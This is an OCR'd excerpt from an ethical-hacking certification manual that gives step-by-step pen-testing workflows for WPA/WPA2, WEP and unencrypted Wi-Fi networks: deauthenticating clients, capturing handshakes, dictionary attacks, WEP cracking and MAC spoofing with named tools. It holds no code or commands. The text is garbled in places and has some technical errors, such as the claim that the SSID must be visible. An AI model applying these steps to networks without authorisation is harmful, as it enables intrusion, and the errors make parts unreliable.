Penetration testing of a WPA/WPA2-encrypted wireless network consists of the following steps: Step 1: Determine if the network is WPA/WPA2 encrypted First check whether the wireless network is WPA/WPA2 encrypted or not. If the WLAN is WPA/WPA2 encrypted, then deauthenticate the client using tools such as Karma, Hotspotter, Airsnarf, etc. Step 2: Determine if the client is deauthenticated Check whether the client is deauthenticated or not. If YES, sniff the traffic. If NO, check the encryption mechanism and try to deauthenticate the client using the tools. Step 3: Sniff the traffic The pen tester should sniff the network traffic in order to analyze the traffic and search for weak clients. In this step, the attacker should capture the IVs generated by making use of tools such as airodump-ng or Cain & Abel with a bssid filter to collect unique IVs. With the help of wireless sniffing tools, the following can be determined: access points for the authorized Medium Access Control (MAC) address, vendor name, or security configurations.

A

P e n T e s t i n g a W P A /W P A 2 - E n c r y p te d W L A N

Module 15 Page 2384

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

The attacker can then create a list of MAC addresses of authorized access points on the LAN, and cross check this list with the list of MAC addresses found by sniffing. Step 4: Determine if the EAPOL handshake is captured After sniffing the traffic, check whether the EAPOL handshake is captured or not. If YES, perform a WPA/WPA2 dictionary attack. If NO, check whether the client is deauthenticated or not. Step 5: Perform a WPA/WPA2 dictionary attack After capturing the EAPOL handshake, perform a WPA/WPA2 dictionary attack by creating a list of possible passphrases, compute the hashes of those guesses, and check them against the captured EAPOL. This technique is referred to as a dictionary attack. WPA/WPA2 dictionary attacks can be performed using the tools such as coWPAtty, Aircrak-ng, etc. Step 6: Steal confidential information The final step in the process of pen testing a WPA/WPA2-encrypted WLAN is stealing the confidential information.

Module 15 Page 2385

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Pen Testing WEP Encrypted WLAN
J J Check if the SSID is visible or hidden

(•itilwd

c EH
tt*H4i IlMhM

If SSID is visible, sniff the traffic a nd then check the status of packet capturing If the packets are captured/injected, then break the WEP key using tools such as Aircrack-ng, Airsnort, WEPcrack, etc., or else sniff the traffic again. If SSID is hidden, then deauthenticate the client using tools such as Aireplay-ng, Commview, etc., associate the client and then follow the procedure of visible SSID

J

J

Copyright © by IG-GOHCil. All Rights Reserved. Reproduction is Strictly Prohibited.

P e n T e s t i n g a W E P - E n c r y p te d W L A N
Penetration testing of a WEP-encrypted WLAN consists of the following steps: Step 1: Determine of the WLAN is W EP encrypted First check whether the wireless network is WEP encrypted or not. If the WLAN is WEP encrypted, then apply the WPA/WPA2 penetration testing on the wireless network. Step 2: Check for a visible SSID Check whether the SSID of the WLAN is visible or not. The SSID must be visible in order for the Wi-Fi to work properly. If YES, sniff the network traffic. If NO, deauthenticate the client using the tools such as Aireplay-ng, Commview, V o id ll, etc. After d‫־‬authentication try to associate with the client in order to sniff the network traffic. Step 3: Sniff the traffic After getting associated with the client, the attacker or the pen tester should sniff the network traffic in order to analyze the traffic and search for the weak clients. In this step the attacker should capture the IVs generated by making use of tools such as airodump-ng or Cain & Abel with a bssid filter to collect unique IVs. With the help of wireless sniffing tools, the following can be determined: access points for the authorized Medium Access Control (MAC) address, vendor name, or security configurations.
Module 15 Page 2386 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

The attacker can then create a list of MAC addresses of authorized access points on the LAN, and cross check this list with the list of MAC addresses found by sniffing. Step 4: Determine if the packets are captured or injected After sniffing the network traffic, check the status of the packet capturing. Check whether the packets are captured/injected. If the status of the captured/injected packets is YES, then break the W EP or otherwise, sniff the network traffic again. NetworkMiner is a Network Forensic Analysis Tool (NFAT) for Windows. It can be used as a passive network sniffer/packet capturing tool in order to detect operating systems, sessions, hostnames, open ports, etc. without putting any traffic on the network. Step 5: Break W EP After injecting the packets, break the W EP key using tools such as Aircrack-ng, Airsnort, WEPcrack, etc., WEP is the encryption mechanism that is implemented for providing security for the data transmission of the Wi-Fi network. It has some programming flaws in it that are vulnerable to attacks. These W EP keys can be broken easily. Step 6: Launch replay attacks After attaining the WEP encryption key, the attacker can easily launch replay attacks on wireless networks. 1. Check if the SSID is visible or hidden. 2. 3. If the SSID is visible, sniff the traffic, and then check the status of packet capturing. If the packets are captured/injected, then break the WEP key using tools such as Aircrack-ng, Airsnort, WEPcrack, etc., or otherwise sniff the traffic again. If the SSID is hidden, then deauthenticate the client using tools such as Aireplay-ng, Commview, V o id ll, etc.; associate the client and then follow the procedure of a visible SSID.

4.

Module 15 Page 2387

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Pen Testing Unencrypted WLAN
Scan the Wi‫־‬Fi Network

(•itilwd

C EH
tt*H4i IlMbM

‫ ׳‬START

Check if the SSID is visible or hidden

Deauth Client

If SSID is visible, sniff for IP range and then check the status of MAC filtering

If MAC filtering is enabled, spoof valid MAC using tools such as SMAC or connect to the AP using IP within the discovered range

Connect to the AP using IP within the discovered range

If SSID is hidden, discover the SSID using tools such as Aireplay-ng, and follow the procedure of visible SSID

Copyright © by IG-COHCil. All Rights Reserved. Reproduction is Strictly Prohibited.

P e n T e s tin g U n e n c ry p te d W LAN
The following steps illustrate the process of penetration testing of an unencrypted wireless network: Step 1: Scan the Wi-Fi network Penetration testing of a WLAN begins with the scanning of the Wi-Fi network. Scan for the networks to map out the wireless networks in the area. Step 2: Determine if the WLAN is unencryted Check whether it is unencrypted WLAN or encrypted WLAN. If the WLAN is unencrypted, then proceed with the process of pen testing. Step 3: Determine if the SSID is visible Check whether the SSID of the WLAN is visible or not. The SSID must be visible in order for the Wi-Fi to work properly. If YES, sniff for the IP range. If NO, deauthenticate the client using the tools such as Aireplay-ng, Commview, V o id ll, etc. Sfter deauthentication, try to associate with the client using the tools such as Airplay-ng or CommView in order to sniff the IP range. Step 4: Sniff for IP range

&

Module 15 Page 2388

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Use the IP sniffing tools to sniff and discover the IP range of the network. The attacker can launch an attack on the wireless network with a known valid IP range. Step 5: Determine if MAC filtering isenabled After retrieving the IP range using the IP sniffing tools, check for MAC filtering. Check whether MAC filtering is enabled or disabled. If MAC filtering is enabled, then spoof for the valid MAC address. MAC addresses are the requisite credentials for accessing the network. Therefore, if the attacker wants to get connected with the target network, then he or she should have a valid MAC address. If MAC address filtering is disabled, then the attacker can connect to the AP using IP within the discovered range. Step 6: Spoof a valid MAC A valid MAC address can be obtained by spoofing it. MAC addresses can be spoofed using tools such as MAC ID changer (TMAC, SMAC).

Module 15 Page 2389

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

M o d u le S u m m a ry

CEH

□ □

IEEE 802.11 standards based Wi-Fi networks are widely used for communication and data transfer across a radio network A Wi-Fi infrastructure generally consists of hardware components such as wireless routers and APs, antennas, relay towers and authentication servers, and software components such as encryption algorithms, key management and distribution mechanisms Most widely used wireless encryption mechanisms include WEP, WPA and WPA2, of which, WPA2 is considered most secure W EP uses 24-bit initialization vector (IV) to form stream cipher RC4 for confidentiality, and the CRC-32 checksum for integrity of wireless transmission WPA uses TKIP which utilizes the RC4 stream cipher encryption with 128-bit keys and 64-bit keys for authentication whereas WPA2 encrypts the network traffic using a 256 bit key with AES encryption W EP is vulnerable to various analytical attack that recovers the key due to its weak IVs whereas WPA is vulnerable to password brute forcing attacks Wi-Fi networks are vulnerable to various access control, integrity, confidentiality, availability and authentication attacks Wi-Fi attack countermeasures include configuration best practices, SSID settings best practices, authentication best practices and wireless IDS systems

□ □ □ □ □ □

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

M o d u le S u m m a ry

‫®י‬

9 IEEE 802.11 standards based communication and data transfer across a radio network.

Wi-Fi

networks

are

widely

used

for

A Wi-Fi infrastructure generally consists of hardware components such as wireless routers and APs, antennas, relay towers and authentication servers, and software components such as encryption algorithms, key management, and distribution mechanisms. Most widely used wireless encryption mechanisms include WEP, WPA, and WPA2, of which, WPA2 is considered most secure. WEP uses a 24-bit initialization vector (IV) to form a stream cipher RC4 for confidentiality and the CRC-32 checksum for integrity of wireless transmission. 0 WPA uses TKIP,which utilizes the RC4 stream cipher encryption with 128-bit keys and 64-bit keys for authentication, whereas WPA2 encrypts the network traffic using a 256 bit key with AES encryption. W EP is vulnerable to various analytical attacks that recover the key due to its weak IVs, whereas WPA is vulnerable to password brute forcing attacks.

Module 15 Page 2390

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Wi-Fi networks are vulnerable to various access control, integrity, confidentiality, availability, and authentication attacks. Wi-Fi attack countermeasures include configuration best practices, SSID settings best

9

Module 15 Page 2391

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Sign up to vote on this title
UsefulNot useful